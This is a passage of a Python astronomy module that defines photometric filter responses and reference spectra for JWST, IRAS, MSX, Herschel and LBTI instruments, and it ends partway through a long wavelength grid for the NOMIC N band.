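    h = 6.62607015e-34   # Planck constant, J s
    k = 1.380649e-23     # Boltzmann constant, J/K
    c = 2.99792458e8     # speed of light, m/s
    return 2.0*h*nu**3/c**2/np.expm1(h*nu/(k*temp))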
# JWST NIRCAM, units of electrons/photon
nrc_filt_loc = os.path.dirname(os.path.abspath(__file__))+ \
'/data/filters/nircam/'
for file in glob.glob(nrc_filt_loc+'*.txt'):
    filt_name = 'NIRCAM.'+os.path.basename(file).split('_')[0]
    # read the wavelength and response columns in a single pass
    nrc_wav, nrc_resp = np.loadtxt(file, skiprows=1, usecols=(0, 1),
                                   unpack=True)
    filters[filt_name] = {
        'magnitude_system': 'Vega',
        'response_type': 'photon',
        'ref_wavelength': None,
        'ref_spectrum': None,
        'response_ref': 'https://jwst-docs.stsci.edu/display/JTI/NIRCam+Filters',
        'wav_micron': nrc_wav,
        'response': nrc_resp
        }
# JWST MIRI, units of electrons/photon; read the CSV once, not per filter
miri_file = os.path.dirname(os.path.abspath(__file__))+ \
    '/data/filters/ImPCE_TN-00072-ATC-Iss2.csv'
miri_data = np.loadtxt(miri_file, delimiter=',', skiprows=2)
for i,filt in enumerate(['F560W','F770W','F1000W','F1280W','F1130W',
                         'F1500W','F1800W','F2100W','F2550W']):
    filt_name = 'MIRI.'+filt
    filters[filt_name] = {
        'magnitude_system': 'Vega',
        'response_type': 'photon',
        'ref_wavelength': None,
        'ref_spectrum': None,
        'response_ref': 'https://jwst-docs.stsci.edu/display/JTI/MIRI+Filters+and+Dispersers',
        'wav_micron': miri_data[:,0],
        'response': miri_data[:,i+1]
        }
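# To make the 'response_type' distinction concrete, a minimal synthetic
# photometry sketch. Illustration only, not this module's machinery; the
# assumption is that a 'photon' (QE-based) response picks up an extra
# factor of wavelength when band-averaging an energy flux density F_nu.
def _band_averaged_fnu_sketch(wav_um, response, fnu, response_type='photon'):
    """Band-averaged F_nu for fnu sampled at wav_um (micron)."""
    wav = np.asarray(wav_um, dtype=float)
    r = np.asarray(response, dtype=float)
    if response_type == 'photon':
        r = r*wav   # photon counting: weight energy flux by lambda
    return np.trapz(r*np.asarray(fnu, dtype=float), wav)/np.trapz(r, wav)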
# IRAS: RSRs; the calibrations are empirical, see Rieke+2008
filters['IRAS12'] = {'svo_name': 'IRAS/IRAS.12mu',
'response_type': 'energy',
'ref_wavelength': 12.0,
'measurement_calibration': lambda x: 0.976*x,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRAS25'] = {'svo_name': 'IRAS/IRAS.25mu',
'response_type': 'energy',
'ref_wavelength': 25.0,
'measurement_calibration': lambda x: 0.94*x,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRAS60'] = {'svo_name': 'IRAS/IRAS.60mu',
'response_type': 'energy',
'ref_wavelength': 60.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRAS100'] = {'svo_name': 'IRAS/IRAS.100mu',
'response_type': 'energy',
'ref_wavelength': 100.0,
'ref_spectrum': lambda nu: 1.0/nu}
# MSX: RSRs; ref spectrum is F_nu proportional to 1/nu^2
filters['MSX8'] = {'svo_name': 'MSX/MSX.A',
'response_type': 'energy',
'ref_wavelength': 8.28,
'ref_spectrum': lambda nu: 1.0/nu}
filters['MSX12'] = {'svo_name': 'MSX/MSX.C',
'response_type': 'energy',
'ref_wavelength': 12.13,
'ref_spectrum': lambda nu: 1.0/nu}
filters['MSX15'] = {'svo_name': 'MSX/MSX.D',
'response_type': 'energy',
'ref_wavelength': 14.65,
'ref_spectrum': lambda nu: 1.0/nu}
filters['MSX21'] = {'svo_name': 'MSX/MSX.E',
'response_type': 'energy',
'ref_wavelength': 21.34,
'ref_spectrum': lambda nu: 1.0/nu}
# PACS/SPIRE: RSRs; ref spectrum F_nu proportional to 1/nu
filters['PACS70'] = {'svo_name': 'Herschel/Pacs.blue',
'response_type': 'energy',
'ref_wavelength': 70.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['PACS100'] = {'svo_name': 'Herschel/Pacs.green',
'response_type': 'energy',
'ref_wavelength': 100.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['PACS160'] = {'svo_name': 'Herschel/Pacs.red',
'response_type': 'energy',
'ref_wavelength': 160.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['SPIRE250'] = {'svo_name': 'Herschel/SPIRE.PSW',
'response_type': 'energy',
'ref_wavelength': 250.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['SPIRE350'] = {'svo_name': 'Herschel/SPIRE.PMW',
'response_type': 'energy',
'ref_wavelength': 350.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['SPIRE500'] = {'svo_name': 'Herschel/SPIRE.PLW',
'response_type': 'energy',
'ref_wavelength': 500.0,
'ref_spectrum': lambda nu: 1.0/nu}
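# Sketch of how 'ref_spectrum' is typically used: quoted fluxes assume the
# reference spectrum, so a colour correction K = <R*ref>/<R*src> rescales a
# measurement to a different assumed source spectrum. Hedged illustration
# only; the function and argument names are hypothetical.
def _colour_correction_sketch(wav_um, response, ref_spectrum, src_spectrum):
    nu = 2.99792458e14/np.asarray(wav_um, dtype=float)   # Hz, wav in micron
    r = np.asarray(response, dtype=float)
    # nu runs from high to low here; the trapz sign cancels in the ratio
    return np.trapz(r*ref_spectrum(nu), nu)/np.trapz(r*src_spectrum(nu), nu)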
# LBTI NOMIC N band; assumed to be QE (photon-counting) based
filters['NOMICN'] = {
'magnitude_system': 'Vega',
'zero_point': 31.3207,
'zero_point_ref': 'bla',
'ref_wavelength': None,
'ref_spectrum': None,
'response_type': 'photon',
'response_ref': 'bla',
'wav_micron':[
9.000, 9.001, 9.002, 9.003, 9.004, 9.005, 9.006, 9.007, 9.008,
9.009, 9.010, 9.011, 9.012, 9.013, 9.014, 9.015, 9.016, 9.017,
9.018, 9.019, 9.020, 9.021, 9.022, 9.023, 9.024, 9.025, 9.026,
9.027, 9.028, 9.029, 9.030, 9.031, 9.032, 9.033, 9.034, 9.035,
9.036, 9.037, 9.038, 9.039, 9.040, 9.041, 9.042, 9.043, 9.044,
9.045, 9.046, 9.047, 9.048, 9.049, 9.050, 9.051, 9.052, 9.053,
9.054, 9.055, 9.056, 9.057, 9.058, 9.059, 9.060, 9.061, 9.062,
9.063, 9.064, 9.065, 9.066, 9.067, 9.068, 9.069, 9.070, 9.071,
9.072, 9.073, 9.074, 9.075, 9.076, 9.077, 9.078, 9.079, 9.080,
9.081, 9.082, 9.083, 9.084, 9.085, 9.086, 9.087, 9.088, 9.089,
9.090, 9.091, 9.092, 9.093, 9.094, 9.095, 9.096, 9.097, 9.098,
9.099, 9.100, 9.101, 9.102, 9.103, 9.104, 9.105, 9.106, 9.107,
9.108, 9.109, 9.110, 9.111, 9.112, 9.113, 9.114, 9.115, 9.116,
9.117, 9.118, 9.119, 9.120, 9.121, 9.122, 9.123, 9.124, 9.125,
9.126, 9.127, 9.128, 9.129, 9.130, 9.131, 9.132, 9.133, 9.134,
9.135, 9.136, 9.137, 9.138, 9.139, 9.140, 9.141, 9.142, 9.143,
9.144, 9.145, 9.146, 9.147, 9.148, 9.149, 9.150, 9.151, 9.152,
9.153, 9.154, 9.155, 9.156, 9.157, 9.158, 9.159, 9.160, 9.161,
9.162, 9.163, 9.164, 9.165, 9.166, 9.167, 9.168, 9.169, 9.170,
9.171, 9.172, 9.173, 9.174, 9.175, 9.176, 9.177, 9.178, 9.179,
9.180, 9.181, 9.182, 9.183, 9.184, 9.185, 9.186, 9.187, 9.188,
9.189, 9.190, 9.191, 9.192, 9.193, 9.194, 9.195, 9.196, 9.197,
9.198, 9.199, 9.200, 9.201, 9.202, 9.203, 9.204, 9.205, 9.206,
9.207, 9.208, 9.209, 9.210, 9.211, 9.212, 9.213, 9.214, 9.215,
9.216, 9.217, 9.218, 9.219, 9.220, 9.221, 9.222, 9.223, 9.224,
9.225, 9.226, 9.227, 9.228, 9.229, 9.230, 9.231, 9.232, 9.233,
9.234, 9.235, 9.236, 9.237, 9.238, 9.239, 9.240, 9.241, 9.242,
9.243, 9.244, 9.245, 9.246, 9.247, 9.248, 9.249, 9.250, 9.251,
9.252, 9.253, 9.254, 9.255, 9.256, 9.257, 9.258, 9.259, 9.260,
9.261, 9.262, 9.263, 9.264, 9.265, 9.266, 9.267, 9.268, 9.269,
9.270, 9.271, 9.272, 9.273, 9.274, 9.275, 9.276, 9.277, 9.278,
9.279, 9.280, 9.281, 9.282, 9.283, 9.284, 9.285, 9.286, 9.287,
9.288, 9.289, 9.290, 9.291, 9.292, 9.293, 9.294, 9.295, 9.296,
9.297, 9.298, 9.299, 9.300, 9.301, 9.302, 9.303, 9.304, 9.305,
9.306, 9.307, 9.308, 9.309, 9.310, 9.311, 9.312, 9.313, 9.314,
9.315, 9.316, 9.317, 9.318, 9.319, 9.320, 9.321, 9.322, 9.323,
9.324, 9.325, 9.326, 9.327, 9.328, 9.329, 9.330, 9.331, 9.332,
9.333, 9.334, 9.335, 9.336, 9.337, 9.338, 9.339, 9.340, 9.341,
9.342, 9.343, 9.344, 9.345, 9.346, 9.347, 9.348, 9.349, 9.350,
9.351, 9.352, 9.353, 9.354, 9.355, 9.356, 9.357, 9.358, 9.359,
9.360, 9.361, 9.362, 9.363, 9.364, 9.365, 9.366, 9.367, 9.368,
9.369, 9.370, 9.371, 9.372, 9.373, 9.374, 9.375, 9.376, 9.377,
9.378, 9.379, 9.380, 9.381, 9.382, 9.383, 9.384, 9.385, 9.386,
9.387, 9.388, 9.389, 9.390, 9.391, 9.392, 9.393, 9.394, 9.395,
9.396, 9.397, 9.398, 9.399, 9.400, 9.401, 9.402, 9.403, 9.404,
9.405, 9.406, 9.407, 9.408, 9.409, 9.410, 9.411, 9.412, 9.413,
9.414, 9.415, 9.416, 9.417, 9.418, 9.419, 9.420, 9.421, 9.422,
9.423, 9.424, 9.425, 9.426, 9.427, 9.428, 9.429, 9.430, 9.431,
9.432, 9.433, 9.434, 9.435, 9.436, 9.437, 9.438, 9.439, 9.440,
9.441, 9.442, 9.443, 9.444, 9.445, 9.446, 9.447, 9.448, 9.449,
9.450, 9.451, 9.452, 9.453, 9.454, 9.455, 9.456, 9.457, 9.458,
9.459, 9.460, 9.461, 9.462, 9.463, 9.464, 9.465, 9.466, 9.467,
9.468, 9.469, 9.470, 9.471, 9.472, 9.473, 9.474, 9.475, 9.476,
9.477, 9.478, 9.479, 9.480, 9.481, 9.482, 9.483, 9.484, 9.485,
9.486, 9.487, 9.488, 9.489, 9.490, 9.491, 9.492, 9.493, 9.494,
9.495, 9.496, 9.497, 9.498, 9.499, 9.500, 9.501, 9.502, 9.503,
9.504, 9.505, 9.506, 9.507, 9.508, 9.509, 9.510, 9.511, 9.512,
9.513, 9.514, 9.515, 9.516, 9.517, 9.518, 9.519, 9.520, 9.521,
9.522, 9.523, 9.524, 9.525, 9.526, 9.527, 9.528, 9.529, 9.530,
9.531, 9.532, 9.533, 9.534, 9.535, 9.536, 9.537, 9.538, 9.539,
9.540, 9.541, 9.542, 9.543, 9.544, 9.545, 9.546, 9.547, 9.548,
9.549, 9.550, 9.551, 9.552, 9.553, 9.554, 9.555, 9.556, 9.557,
9.558, 9.559, 9.560, 9.561, 9.562, 9.563, 9.564, 9.565, 9.566,
9.567, 9.568, 9.569, 9.570, 9.571, 9.572, 9.573, 9.574, 9.575,
9.576, 9.577, 9.578, 9.579, 9.580, 9.581, 9.582, 9.583, 9.584,
9.585, 9.586, 9.587, 9.588, 9.589, 9.590, 9.591, 9.592, 9.593,
9.594, 9.595, 9.596, 9.597, 9.598, 9.599, 9.600, 9.601, 9.602,
9.603, 9.604, 9.605, 9.606, 9.607, 9.608, 9.609, 9.610, 9.611,
9.612, 9.613, 9.614, 9.615, 9.616, 9.617, 9.618, 9.619, 9.620,
9.621, 9.622, 9.623, 9.624, 9.625, 9.626, 9.627, 9.628, 9.629,
9.630, 9.631, 9.632, 9.633, 9.634, 9.635, 9.636, 9.637, 9.638,
9.639, 9.640, 9.641, 9.642, 9.643, 9.644, 9.645, 9.646, 9.647,
9.648, 9.649, 9.650, 9.651, 9.652, 9.653, 9.654, 9.655, 9.656,
9.657, 9.658, 9.659, 9.660, 9.661, 9.662, 9.663, 9.664, 9.665,
9.666, 9.667, 9.668, 9.669, 9.670, 9.671, 9.672, 9.673, 9.674,
9.675, 9.676, 9.677, 9.678, 9.679, 9.680, 9.681, 9.682, 9.683,
9.684, 9.685, 9.686, 9.687, 9.688, 9.689, 9.690, 9.691, 9.692,
9.693, 9.694, 9.695, 9.696, 9.697, 9.698, 9.699, 9.700, 9.701,
9.702, 9.703, 9.704, 9.705, 9.706, 9.707, 9.708, 9.709, 9.710,
9.711, 9.712, 9.713, 9.714, 9.715, 9.716, 9.717, 9.718, 9.719,
9.720, 9.721, 9.722, 9.723, 9.724, 9.725, 9.726, 9.727, 9.728,
9.729, 9.730, 9.731, 9.732, 9.733, 9.734, 9.735, 9.736, 9.737,
9.738, 9.739, 9.740, 9.741, 9.742, 9.743, 9.744, 9.745, 9.746,
9.747, 9.748, 9.749, 9.750, 9.751, 9.752, 9.753, 9.754, 9.755,
9.756, 9.757, 9.758, 9.759, 9.760, 9.761, 9.762, 9.763, 9.764,
9.765, 9.766, 9.767, 9.768, 9.769, 9.770, 9.771, 9.772, 9.773,
9.774, 9.775, 9.776, 9.777, 9.778, 9.779, 9.780, 9.781, 9.782,
9.783, 9.784, 9.785, 9.786, 9.787, 9.788, 9.789, 9.790, 9.791,
9.792, 9.793, 9.794, 9.795, 9.796, 9.797, 9.798, 9.799, 9.800,
9.801, 9.802, 9.803, 9.804, 9.805, 9.806, 9.807, 9.808, 9.809,
9.810, 9.811, 9.812, 9.813, 9.814, 9.815, 9.816, 9.817, 9.818,
9.819, 9.820, 9.821, 9.822, 9.823, 9.824, 9.825, 9.826, 9.827,
9.828, 9.829, 9.830, 9.831, 9.832, 9.833, 9.834, 9.835, 9.836,
9.837, 9.838, 9.839, 9.840, 9.841, 9.842, 9.843, 9.844, 9.845,
9.846, 9.847, 9.848, 9.849, 9.850, 9.851, 9.852, 9.853, 9.854,
9.855, 9.856, 9.857, 9.858, 9.859, 9.860, 9.861, 9.862, 9.863,
9.864, 9.865, 9.866, 9.867, 9.868, 9.869, 9.870, 9.871, 9.872,
9.873, 9.874, 9.875, 9.876, 9.877, 9.878, 9.879, 9.880, 9.881,
9.882, 9.883, 9.884, 9.885, 9.886, 9.887, 9.888, 9.889, 9.890,
9.891, 9.892, 9.893, 9.894, 9.895, 9.896, 9.897, 9.898, 9.899,
9.900, 9.901, 9.902, 9.903, 9.904, 9.905, 9.906, 9.907, 9.908,
9.909, 9.910, 9.911, 9.912, 9.913, 9.914, 9.915, 9.916, 9.917,
9.918, 9.919, 9.920, 9.921, 9.922, 9.923, 9.924, 9.925, 9.926,
9.927, 9.928, 9.929, 9.930, 9.931, 9.932, 9.933, 9.934, 9.935,
9.936, 9.937, 9.938, 9.939, 9.940, 9.941, 9.942, 9.943, 9.944,
9.945, 9.946, 9.947, 9.948, 9.949, 9.950, 9.951, 9.952, 9.953,
9.954, 9.955, 9.956, 9.957, 9.958, 9.959, 9.960, 9.961, 9.962,
9.963, 9.964, 9.965, 9.966, 9.967, 9.968, 9.969, 9.970, 9.971,
9.972, 9.973, 9.974, 9.975, 9.976, 9.977, 9.978, 9.979, 9.980,
9.981, 9.982, 9.983, 9.984, 9.985, 9.986, 9.987, 9.988, 9.989,
9.990, 9.991, 9.992, 9.993, 9.994, 9.995, 9.996, 9.997, 9.998,
9.999, 10.000, 10.001, 10.002, 10.003, 10.004, 10.005, 10.006, 10.007,
10.008, 10.009, 10.010, 10.011, 10.012, 10.013, 10.014, 10.015, 10.016,
10.017, 10.018, 10.019, 10.020, 10.021, 10.022, 10.023, 10.024, 10.025,
10.026, 10.027, 10.028, 10.029, 10.030, 10.031, 10.032, 10.033, 10.034,
10.035, 10.036, 10.037, 10.038, 10.039, 10.040, 10.041, 10.042, 10.043,
10.044, 10.045, 10.046, 10.047, 10.048, 10.049, 10.050, 10.051, 10.052,
10.053, 10.054, 10.055, 10.056, 10.057, 10.058, 10.059, 10.060, 10.061,
10.062, 10.063, 10.064, 10.065, 10.066, 10.067, 10.068, 10.069, 10.070,
10.071, 10.072, 10.073, 10.074, 10.075, 10.076, 10.077, 10.078, 10.079,
10.080, 10.081, 10.082, 10.083, 10.084, 10.085, 10.086, 10.087, 10.088,
10.089, 10.090, 10.091, 10.092, 10.093, 10.094, 10.095, 10.096, 10.097,
10.098, 10.099, 10.100, 10.101, 10.102, 10.103, 10.104, 10.105, 10.106,
10.107, 10.108, 10.109, 10.110, 10.111, 10.112, 10.113, 10.114, 10.115,
10.116, 10.117, 10.118, 10.119, 10.120, 10.121, 10.122, 10.123, 10.124,
10.125, 10.126, 10.127, 10.128, 10.129, 10.130, 10.131, 10.132, 10.133,
10.134, 10.135, 10.136, 10.137, 10.138, 10.139, 10.140, 10.141, 10.142,
10.143, 10.144, 10.145, 10.146, 10.147, 10.148, 10.149, 10.150, 10.151,
10.152, 10.153, 10.154, 10.155, 10.156, 10.157, 10.158, 10.159, 10.160,
10.161, 10.162, 10.163, 10.164, 10.165, 10.166, 10.167, 10.168, 10.169,
10.170, 10.171, 10.172, 10.173, 10.174, 10.175, 10.176, 10.177, 10.178,
10.179, 10.180, 10.181, 10.182, 10.183, 10.184, 10.185, 10.186, 10.187,
10.188, 10.189, 10.190, 10.191, 10.192, 10.193, 10.194, 10.195, 10.196,
10.197, 10.198, 10.199, 10.200, 10.201, 10.202, 10.203, 10.204, 10.205,
10.206, 10.207, 10.208, 10.209, 10.210, 10.211, 10.212, 10.213, 10.214,
10.215, 10.216, 10.217, 10.218, 10.219, 10.220, 10.221, 10.222, 10.223,
10.224, 10.225, 10.226, 10.227, 10.228, 10.229, 10.230, 10.231, 10.232,
10.233, 10.234, 10.235, 10.236, 10.237, 10.238, 10.239, 10.240, 10.241,
10.242, 10.243, 10.244, 10.245, 10.246, 10.247, 10.248, 10.249, 10.250,
10.251, 10.252, 10.253, 10.254, 10.255, 10.256, 10.257, 10.258, 10.259,
10.260, 10.261, 10.262, 10.263, 10.264, 10.265, 10.266, 10.267, 10.268,
10.269, 10.270, 10.271, 10.272, 10.273, 10.274, 10.275, 10.276, 10.277,
10.278, 10.279, 10.280, 10.281, 10.282, 10.283, 10.284, 10.285, 10.286,
10.287, 10.288, 10.289, 10.290, 10.291, 10.292, 10.293, 10.294, 10.295,
10.296, 10.297, 10.298, 10.299, 10.300, 10.301, 10.302, 10.303, 10.304,
10.305, 10.306, 10.307, 10.308, 10.309, 10.310, 10.311, 10.312, 10.313,
10.314, 10.315, 10.316, 10.317, 10.318, 10.319, 10.320, 10.321, 10.322,
10.323, 10.324, 10.325, 10.326, 10.327, 10.328, 10.329, 10.330, 10.331,
10.332, 10.333, 10.334, 10.335, 10.336, 10.337, 10.338, 10.339, 10.340,
10.341, 10.342, 10.343, 10.344, 10.345, 10.346, 10.347, 10.348, 10.349,
10.350, 10.351, 10.352, 10.353, 10.354, 10.355, 10.356, 10.357, 10.358,
10.359, 10.360, 10.361, 10.362, 10.363, 10.364, 10.365, 10.366, 10.367,
10.368, 10.369, 10.370, 10.371, 10.372, 10.373, 10.374, 10.375, 10.376,
10.377, 10.378, 10.379, 10.380, 10.381, 10.382, 10.383, 10.384, 10.385,
10.386, 10.387, 10.388, 10.389, 10.390, 10.391, 10.392, 10.393, 10.394,
10.395, 10.396, 10.397, 10.398, 10.399, 10.400, 10.401, 10.402, 10.403,
10.404, 10.405, 10.406, 10.407, 10.408, 10.409, 10.410, 10.411, 10.412,
10.413, 10.414, 10.415, 10.416, 10.417, 10.418, 10.419, 10.420, 10.421,
10.422, 10.423, 10.424, 10.425, 10.426, 10.427, 10.428, 10.429, 10.430,
10.431, 10.432, 10.433, 10.434, 10.435, 10.436, 10.437, 10.438, 10.439,
10.440, 10.441, 10.442, 10.443, 10.444, 10.445, 10.446, 10.447, 10.448,
10.449, 10.450, 10.451, 10.452, 10.453, 10.454, 10.455, 10.456, 10.457,
10.458, 10.459, 10.460, 10.461, 10.462, 10.463, 10.464, 10.465, 10.466,
10.467, 10.468, 10.469, 10.470, 10.471, 10.472, 10.473, 10.474, 10.475,
10.476, 10.477, 10.478, 10.479, 10.480, 10.481, 10.482, 10.483, 10.484,
10.485, 10.486, 10.487, 10.488, 10.489, 10.490, 10.491, 10.492, 10.493,
10.494, 10.495, 10.496, 10.497, 10.498, 10.499, 10.500, 10.501, 10.502,
10.503, 10.504, 10.505, 10.506, 10.507, 10.508, 10.509, 10.510, 10.511,
10.512, 10.513, 10.514, 10.515, 10.516, 10.517, 10.518, 10.519, 10.520,
10.521, 10.522, 10.523, 10.524, 10.525, 10.526, 10.527, 10.528, 10.529,
10.530, 10.531, 10.532, 10.533, 10.534, 10.535, 10.536, 10.537, 10.538,
10.539, 10.540, 10.541, 10.542, 10.543, 10.544, 10.545, 10.546, 10.547,
10.548, 10.549, 10.550, 10.551, 10.552, 10.553, 10.554, 10.555, 10.556,
10.557, 10.558, 10.559, 10.560, 10.561, 10.562, 10.563, 10.564, 10.565,
10.566, 10.567, 10.568, 10.569, 10.570, 10.571, 10.572, 10.573, 10.574,
10.575, 10.576, 10.577, 10.578, 10.579, 10.580, 10.581, 10.582, 10.583,
10.584, 10.585, 10.586, 10.587, 10.588, 10.589, 10.590, 10.591, 10.592,
10.593, 10.594, 10.595, 10.596, 10.597, 10.598, 10.599, 10.600, 10.601,
10.602, 10.603, 10.604, 10.605, 10.606, 10.607, 10.608, 10.609, 10.610,
10.611, 10.612, 10.613, 10.614, 10.615, 10.616, 10.617, 10.618, 10.619,
10.620, 10.621, 10.622, 10.623, 10.624, 10.625, 10.626, 10.627, 10.628,
10.629, 10.630, 10.631, 10.632, 10.633, 10.634, 10.635, 10.636, 10.637,
10.638, 10.639, 10.640, 10.641, 10.642, 10.643, 10.644, 10.645, 10.646,
10.647, 10.648, 10.649, 10.650, 10.651, 10.652, 10.653, 10.654, 10.655,
10.656, 10.657, 10.658, 10.659, 10.660, 10.661, 10.662, 10.663, 10.664,
10.665, 10.666, 10.667, 10.668, 10.669, 10.670, 10.671, 10.672, 10.673,
10.674, 10.675, 10.676, 10.677, 10.678, 10.679, 10.680, 10.681, 10.682,
10.683, 10.684, 10.685, 10.686, 10.687, 10.688, 10.689, 10.690, 10.691,
10.692, 10.693, 10.694, 10.695, 10.696, 10.697, 10.698, 10.699, 10.700,
10.701, 10.702, 10.703, 10.704, 10.705, 10.706, 10.707, 10.708, 10.709,
10.710, 10.711, 10.712, 10.713, 10.714, 10.715, 10.716, 10.717, 10.718,
10.719, 10.720, 10.721, 10.722, 10.723, 10.724, 10.725, 10.726, 10.727,
10.728, 10.729, 10.730, 10.731, 10.732, 10.733, 10.734, 10.735, 10.736,
10.737, 10.738, 10.739, 10.740, 10.741, 10.742, 10.743, 10.744, 10.745,
10.746, 10.747, 10.748, 10.749, 10.750, 10.751, 10.752, 10.753, 10.754,
10.755, 10.756, 10.757, 10.758, 10.759, 10.760, 10.761, 10.762, 10.763,
10.764, 10.765, 10.766, 10.767, 10.768, 10.769, 10.770, 10.771, 10.772,
10.773, 10.774, 10.775, 10.776, 10.777, 10.778, 10.779, 10.780, 10.781,
10.782, 10.783, 10.784, 10.785, 10.786, 10.787, 10.788, 10.789, 10.790,
10.791, 10.792, 10.793, 10.794, 10.795, 10.796, 10.797, 10.798, 10.799,
10.800, 10.801, 10.802, 10.803, 10.804, 10.805, 10.806, 10.807, 10.808,
10.809, 10.810, 10.811, 10.812, 10.813, 10.814, 10.815, 10.816, 10.817,
10.818, 10.819, 10.820, 10.821, 10.822, 10.823, 10.824, 10.825, 10.826,
10.827, 10.828, 10.829, 10.830, 10.831, 10.832, 10.833, 10.834, 10.835,
10.836, 10.837, 10.838, 10.839, 10.840, 10.841, 10.842, 10.843, 10.844,
10.845, 10.846, 10.847, 10.848, 10.849, 10.850, 10.851, 10.852, 10.853,
10.854, 10.855, 10.856, 10.857, 10.858, 10.859, 10.860, 10.861, 10.862,
10.863, 10.864, 10.865, 10.866, 10.867, 10.868, 10.869, 10.870, 10.871,
10.872, 10.873, 10.874, 10.875, 10.876, 10.877, 10.878, 10.879, 10.880,
10.881, 10.882, 10.883, 10.884, 10.885, 10.886, 10.887, 10.888, 10.889,
10.890, 10.891, 10.892, 10.893, 10.894, 10.895, 10.896, 10.897, 10.898,
10.899, 10.900, 10.901, 10.902, 10.903, 10.904, 10.905, 10.906, 10.907,
10.908, 10.909, 10.910, 10.911, 10.912, 10.913, 10.914, 10.915, 10.916,
10.917, 10.918, 10.919, 10.920, 10.921, 10.922, 10.923, 10.924, 10.925,
10.926, 10.927, 10.928, 10.929, 10.930, 10.931, 10.932, 10.933, 10.934,
10.935, 10.936, 10.937, 10.938, 10.939, 10.940, 10.941, 10.942, 10.943,
10.944, 10.945, 10.946, 10.947, 10.948, 10.949, 10.950, 10.951, 10.952,
10.953, 10.954, 10.955, 10.956, 10.957, 10.958, 10.959, 10.960, 10.961,
10.962, 10.963, 10.964, 10.965, 10.966, 10.967, 10.968, 10.969, 10.970,
10.971, 10.972, 10.973, 10.974, 10.975, 10.976, 10.977, 10.978, 10.979,
10.980, 10.981, 10.982, 10.983, 10.984, 10.985, 10.986, 10.987, 10.988,
10.989, 10.990, 10.991, 10.992, 10.993, 10.994, 10.995, 10.996, 10.997,
10.998, 10.999, 11.000, 11.001, 11.002, 11.003, 11.004, 11.005, 11.006,
11.007, 11.008, 11.009, 11.010, 11.011, 11.012, 11.013, 11.014, 11.015,
11.016, 11.017, 11.018, 11.019, 11.020, 11.021, 11.022, 11.023, 11.024,
11.025, 11.026, 11.027, 11.028, 11.029, 11.030, 11.031, 11.032, 11.033,
11.034, 11.035, 11.036, 11.037, 11.038, 11.039, 11.040, 11.041, 11.042,
11.043, 11.044, 11.045, 11.046, 11.047, 11.048, 11.049, 11.050, 11.051,
11.052, 11.053, 11.054, 11.055, 11.056, 11.057, 11.058, 11.059, 11.060,
11.061, 11.062, 11.063, 11.064, 11.065, 11.066, 11.067, 11.068, 11.069,
11.070, 11.071, 11.072, 11.073, 11.074, 11.075, 11.076, 11.077, 11.078,
11.079, 11.080, 11.081, 11.082, 11.083, 11.084, 11.085, 11.086, 11.087,
11.088, 11.089, 11.090, 11.091, 11.092, 11.093, 11.094, 11.095, 11.096,
11.097, 11.098, 11.099, 11.100, 11.101, 11.102, 11.103, 11.104, 11.105,
11.106, 11.107, 11.108, 11.109, 11.110, 11.111, 11.112, 11.113, 11.114,
11.115, 11.116, 11.117, 11.118, 11.119, 11.120, 11.121, 11.122, 11.123,
11.124, 11.125, 11.126, 11.127, 11.128, 11.129, 11.130, 11.131, 11.132,
11.133, 11.134, 11.135, 11.136, 11.137, 11.138, 11.139, 11.140, 11.141,
11.142, 11.143, 11.144, 11.145, 11.146, 11.147, 11.148, 11.149, 11.150,
11.151, 11.152, 11.153, 11.154, 11.155, 11.156, 11.157, 11.158, 11.159,
11.160, 11.161, 11.162, 11.163, 11.164, 11.165, 11.166, 11.167, 11.168,
11.169, 11.170, 11.171, 11.172, 11.173, 11.174, 11.175, 11.176, 11.177,
11.178, 11.179, 11.180, 11.181, 11.182, 11.183, 11.184, 11.185, 11.186,
11.187, 11.188, 11.189, 11.190, 11.191, 11.192, 11.193, 11.194, 11.195,
11.196, 11.197, 11.198, 11.199, 11.200, 11.201, 11.202, 11.203, 11.204,
11.205, 11.206, 11.207, 11.208, 11.209, 11.210, 11.211, 11.212, 11.213,
11.214, 11.215, 11.216, 11.217, 11.218, 11.219, 11.220, 11.221, 11.222,
11.223, 11.224, 11.225, 11.226, 11.227, 11.228, 11.229, 11.230, 11.231,
11.232, 11.233, 11.234, 11.235, 11.236, 11.237, 11.238, 11.239, 11.240,
11.241, 11.242, 11.243, 11.244, 11.245, 11.246, 11.247, 11.248, 11.249,
11.250, 11.251, 11.252, 11.253, 11.254, 11.255, 11.256, 11.257, 11.258,
11.259, 11.260, 11.261, 11.262, 11.263, 11.264, 11.265, 11.266, 11.267,
11.268, 11.269, 11.270, 11.271, 11.272, 11.273, 11.274, 11.275, 11.276,
11.277, 11.278, 11.279, 11.280, 11.281, 11.282, 11.283, 11.284, 11.285,
11.286, 11.287, 11.288, 11.289, 11.290, 11.291, 11.292, 11.293, 11.294,
11.295, 11.296, 11.297, 11.298, 11.299, 11.300, 11.301, 11.302, 11.303,
11.304, 11.305, 11.306, 11.307, 11.308, 11.309, 11.310, 11.311, 11.312,
11.313, 11.314, 11.315, 11.316, 11.317, 11.318, 11.319, 11.320, 11.321,
11.322, 11.323, 11.324, 11.325, 11.326, 11.327, 11.328, 11.329, 11.330,
11.331, 11.332, 11.333, 11.334, 11.335, 11.336, 11.337, 11.338, 11.339,
11.340, 11.341, 11.342, 11.343, 11.344, 11.345, 11.346, 11.347, 11.348,
11.349, 11.350, 11.351, 11.352, 11.353, 11.354, 11.355, 11.356, 11.357,
11.358, 11.359, 11.360, 11.361, 11.362, 11.363, 11.364, 11.365, 11.366,
11.367, 11.368, 11.369, 11.370, 11.371, 11.372, 11.373, 11.374, 11.375,
11.376, 11.377, 11.378, 11.379, 11.380, 11.381, 11.382, 11.383, 11.384,
11.385, 11.386, 11.387, 11.388, 11.389, 11.390, 11.391, 11.392, 11.393,
11.394, 11.395, 11.396, 11.397, 11.398, 11.399, 11.400, 11.401, 11.402,
11.403, 11.404, 11.405, 11.406, 11.407, 11.408, 11.409, 11.410, 11.411,
11.412, 11.413, 11.414, 11.415, 11.416, 11.417, 11.418, 11.419, 11.420,
11.421, 11.422, 11.423, 11.424, 11.425, 11.426, 11.427, 11.428, 11.429,
